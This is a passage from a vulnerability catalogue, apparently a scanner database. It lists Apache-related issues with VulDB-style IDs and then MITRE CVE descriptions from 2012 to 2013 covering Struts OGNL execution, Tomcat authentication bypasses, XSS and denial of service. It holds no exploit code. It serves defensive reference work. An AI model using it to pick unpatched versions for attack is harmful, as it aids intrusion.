2734| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
2735| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
2736| [62833] Apache CXF -/2.6.0 spoofing
2737| [62832] Apache Axis2 up to 1.6.2 spoofing
2738| [62831] Apache Axis up to 1.4 Java Message Service spoofing
2739| [62830] Apache Commons-httpclient 3.0 Payments spoofing
2740| [62826] Apache Libcloud up to 0.11.0 spoofing
2741| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
2742| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
2743| [62661] Apache Axis2 unknown vulnerability
2744| [62658] Apache Axis2 unknown vulnerability
2745| [62467] Apache Qpid up to 0.17 denial of service
2746| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
2747| [6301] Apache HTTP Server mod_pagespeed cross site scripting
2748| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
2749| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
2750| [62035] Apache Struts up to 2.3.4 denial of service
2751| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
2752| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
2753| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
2754| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
2755| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
2756| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
2757| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
2758| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
2759| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
2760| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
2761| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
2762| [61229] Apache Sling up to 2.1.1 denial of service
2763| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
2764| [61094] Apache Roller up to 5.0 cross site scripting
2765| [61093] Apache Roller up to 5.0 cross site request forgery
2766| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
2767| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
2768| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
2769| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
2770| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
2771| [60708] Apache Qpid 0.12 unknown vulnerability
2772| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
2773| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
2774| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
2775| [4882] Apache Wicket up to 1.5.4 directory traversal
2776| [4881] Apache Wicket up to 1.4.19 cross site scripting
2777| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
2778| [60352] Apache Struts up to 2.2.3 memory corruption
2779| [60153] Apache Portable Runtime up to 1.4.3 denial of service
2780| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
2781| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
2782| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
2783| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
2784| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
2785| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
2786| [4571] Apache Struts up to 2.3.1.2 privilege escalation
2787| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
2788| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
2789| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
2790| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
2791| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
2792| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
2793| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
2794| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
2795| [59888] Apache Tomcat up to 6.0.6 denial of service
2796| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
2797| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
2798| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
2799| [59850] Apache Geronimo up to 2.2.1 denial of service
2800| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
2801| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
2802| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
2803| [58413] Apache Tomcat up to 6.0.10 spoofing
2804| [58381] Apache Wicket up to 1.4.17 cross site scripting
2805| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
2806| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
2807| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
2808| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
2809| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
2810| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
2811| [57568] Apache Archiva up to 1.3.4 cross site scripting
2812| [57567] Apache Archiva up to 1.3.4 cross site request forgery
2813| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
2814| [4355] Apache HTTP Server APR apr_fnmatch denial of service
2815| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
2816| [57425] Apache Struts up to 2.2.1.1 cross site scripting
2817| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
2818| [57025] Apache Tomcat up to 7.0.11 information disclosure
2819| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
2820| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
2821| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
2822| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
2823| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
2824| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
2825| [56512] Apache Continuum up to 1.4.0 cross site scripting
2826| [4285] Apache Tomcat 5.x JVM getLocale denial of service
2827| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
2828| [4283] Apache Tomcat 5.x ServletContect privilege escalation
2829| [56441] Apache Tomcat up to 7.0.6 denial of service
2830| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
2831| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
2832| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
2833| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
2834| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
2835| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
2836| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
2837| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
2838| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
2839| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
2840| [54693] Apache Traffic Server DNS Cache unknown vulnerability
2841| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
2842| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
2843| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
2844| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
2845| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
2846| [54012] Apache Tomcat up to 6.0.10 denial of service
2847| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
2848| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
2849| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
2850| [52894] Apache Tomcat up to 6.0.7 information disclosure
2851| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
2852| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
2853| [52786] Apache Open For Business Project up to 09.04 cross site scripting
2854| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
2855| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
2856| [52584] Apache CouchDB up to 0.10.1 information disclosure
2857| [51757] Apache HTTP Server 2.0.44 cross site scripting
2858| [51756] Apache HTTP Server 2.0.44 spoofing
2859| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
2860| [51690] Apache Tomcat up to 6.0 directory traversal
2861| [51689] Apache Tomcat up to 6.0 information disclosure
2862| [51688] Apache Tomcat up to 6.0 directory traversal
2863| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
2864| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
2865| [50626] Apache Solr 1.0.0 cross site scripting
2866| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
2867| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
2868| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
2869| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
2870| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
2871| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
2872| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
2873| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
2874| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
2875| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
2876| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
2877| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
2878| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
2879| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
2880| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
2881| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
2882| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
2883| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
2884| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
2885| [47214] Apachefriends xampp 1.6.8 spoofing
2886| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
2887| [47162] Apachefriends XAMPP 1.4.4 weak authentication
2888| [47065] Apache Tomcat 4.1.23 cross site scripting
2889| [46834] Apache Tomcat up to 5.5.20 cross site scripting
2890| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
2891| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
2892| [86625] Apache Struts directory traversal
2893| [44461] Apache Tomcat up to 5.5.0 information disclosure
2894| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
2895| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
2896| [43663] Apache Tomcat up to 6.0.16 directory traversal
2897| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
2898| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
2899| [43516] Apache Tomcat up to 4.1.20 directory traversal
2900| [43509] Apache Tomcat up to 6.0.13 cross site scripting
2901| [42637] Apache Tomcat up to 6.0.16 cross site scripting
2902| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
2903| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
2904| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
2905| [40924] Apache Tomcat up to 6.0.15 information disclosure
2906| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
2907| [40922] Apache Tomcat up to 6.0 information disclosure
2908| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
2909| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
2910| [40656] Apache Tomcat 5.5.20 information disclosure
2911| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
2912| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
2913| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
2914| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
2915| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
2916| [40234] Apache Tomcat up to 6.0.15 directory traversal
2917| [40221] Apache HTTP Server 2.2.6 information disclosure
2918| [40027] David Castro Apache Authcas 0.4 sql injection
2919| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
2920| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
2921| [3414] Apache Tomcat WebDAV Stored privilege escalation
2922| [39489] Apache Jakarta Slide up to 2.1 directory traversal
2923| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
2924| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
2925| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
2926| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
2927| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
2928| [38524] Apache Geronimo 2.0 unknown vulnerability
2929| [3256] Apache Tomcat up to 6.0.13 cross site scripting
2930| [38331] Apache Tomcat 4.1.24 information disclosure
2931| [38330] Apache Tomcat 4.1.24 information disclosure
2932| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
2933| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
2934| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
2935| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
2936| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
2937| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
2938| [37292] Apache Tomcat up to 5.5.1 cross site scripting
2939| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
2940| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
2941| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
2942| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
2943| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
2944| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
2945| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
2946| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
2947| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
2948| [36225] XAMPP Apache Distribution 1.6.0a sql injection
2949| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
2950| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
2951| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
2952| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
2953| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
2954| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
2955| [34252] Apache HTTP Server denial of service
2956| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
2957| [33877] Apache Opentaps 0.9.3 cross site scripting
2958| [33876] Apache Open For Business Project unknown vulnerability
2959| [33875] Apache Open For Business Project cross site scripting
2960| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
2961| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
2962|
2963| MITRE CVE - https://cve.mitre.org:
2964| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
2965| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
2966| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
2967| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
2968| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
2969| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
2970| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
2971| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
2972| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
2973| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
2974| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
2975| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
2976| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
2977| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
2978| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
2979| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
2980| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
2981| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
2982| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
2983| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
2984| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
2985| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
2986| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
2987| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
2988| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
2989| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
2990| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
2991| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
2992| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
2993| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
2994| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
2995| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
2996| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
2997| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
2998| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
2999| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
3000| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
3001| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
3002| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
3003| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
3004| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
3005| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
3006| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
3007| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
3008| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
3009| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
3010| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
3011| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
3012| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
3013| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
3014| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
3015| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
3016| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
